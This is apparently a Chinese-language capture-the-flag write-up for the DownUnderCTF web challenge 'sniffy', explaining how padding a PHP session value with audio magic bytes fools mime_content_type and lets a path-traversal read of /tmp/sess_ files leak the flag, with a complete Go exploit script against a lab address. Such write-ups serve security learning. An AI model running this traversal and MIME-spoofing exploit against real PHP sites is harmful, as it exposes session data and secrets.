DownUnderCTF web sniffy

题目中给了源码

index.php中将flag的值赋给了session['flag']

session['theme']接收GET传入的theme参数。。。??是PHP中的空合并运算符它的作用是检查左侧的值是否存在且不为null。如果存在,则返回左侧的值;如果不存在,则返回右侧的值。

如果theme以GET的方式传入了值。则$_SESSION['theme']将使用传入的值

audio.php中存在文件读取。但是会判断文件的mine类型是否为audio

mime_content_type函数以magic.mime文件中的信息来确定mime

我们传入的theme值将会在/tmp/sess_xxx文件的中间出现。我们可传入便宜量较大的字符串来更改文件的mime

例如:M.K.M!K!FLT4FLT8这些便宜量较大的值(1080)

同时不知道flag占据了多少了个字节。可以进行4个循环在每个循环中添加一个字符来进行破解

这里是我用exp

Golang 复制代码
package main

import (
	"fmt"
	"io"
	"io/ioutil"
	"net/http"
	"net/url"
	"strings"
)

func main() {
	target := "http://192.168.22.129:1880"
	target2 := "http://192.168.22.129:1880/audio.php"
	//target := "https://httpbin.org/get"
	Client := http.Client{}

	for i := 0; i < 4; i++ {
		req1, err := http.NewRequest("GET", target, nil)
		if err != nil {
			fmt.Println(err)
		}
		param := make(url.Values)
		param.Add("theme", strings.Repeat("s", i)+strings.Repeat("4CHN", 270))
		req1.URL.RawQuery = param.Encode()
		req1.Header.Add("Cookie", "PHPSESSID=yex")
		do, err := Client.Do(req1)
		if err != nil {
			fmt.Println(err)
		}
		defer do.Body.Close()
		_, err = ioutil.ReadAll(do.Body)

		req2, err := http.NewRequest("GET", target2, nil)
		param2 := make(url.Values)
		param2.Add("f", "../../../../../../../tmp/sess_yex")
		req2.URL.RawQuery = param2.Encode()
		do2, _ := Client.Do(req2)
		defer do2.Body.Close()
		data2, _ := io.ReadAll(do2.Body)

		if do2.StatusCode != 403 {

			fmt.Println(string(data2))
		}
	}

}
相关推荐
有代理ip11 小时前
Python 与 Golang 爬虫的隐藏优势
爬虫·python·golang
天远云服13 小时前
天远车辆过户查询API微服务实战:用Go语言构建高性能车况溯源系统
大数据·微服务·架构·golang
女王大人万岁13 小时前
Go标准库 sync 详解
服务器·开发语言·后端·golang
小高Baby@13 小时前
session、cookie、Jwt-token
开发语言·后端·golang
Grassto14 小时前
12 go.sum 是如何保证依赖安全的?校验机制源码解析
安全·golang·go·哈希算法·go module
小二·15 小时前
Go 语言系统编程与云原生开发实战(第12篇)云原生部署实战:Helm Chart × GitOps × 多环境管理(生产级落地)
开发语言·云原生·golang
天空属于哈夫克315 小时前
Go 语言实战:构建一个企微外部群“技术贴收藏夹”小程序后端
小程序·golang·企业微信
小二·15 小时前
Go 语言系统编程与云原生开发实战(第13篇)工程效能实战:Monorepo × 依赖治理 × 构建加速(10万行代码实测)
开发语言·云原生·golang
暴躁小师兄数据学院15 小时前
【WEB3.0零基础转行笔记】Golang编程篇-第4讲:Go语言中的流程控制
开发语言·后端·golang·web3·区块链
lingggggaaaa1 天前
安全工具篇&Go魔改二开&Fscan扫描&FRP代理&特征消除&新增扩展&打乱HASH
学习·安全·web安全·网络安全·golang·哈希算法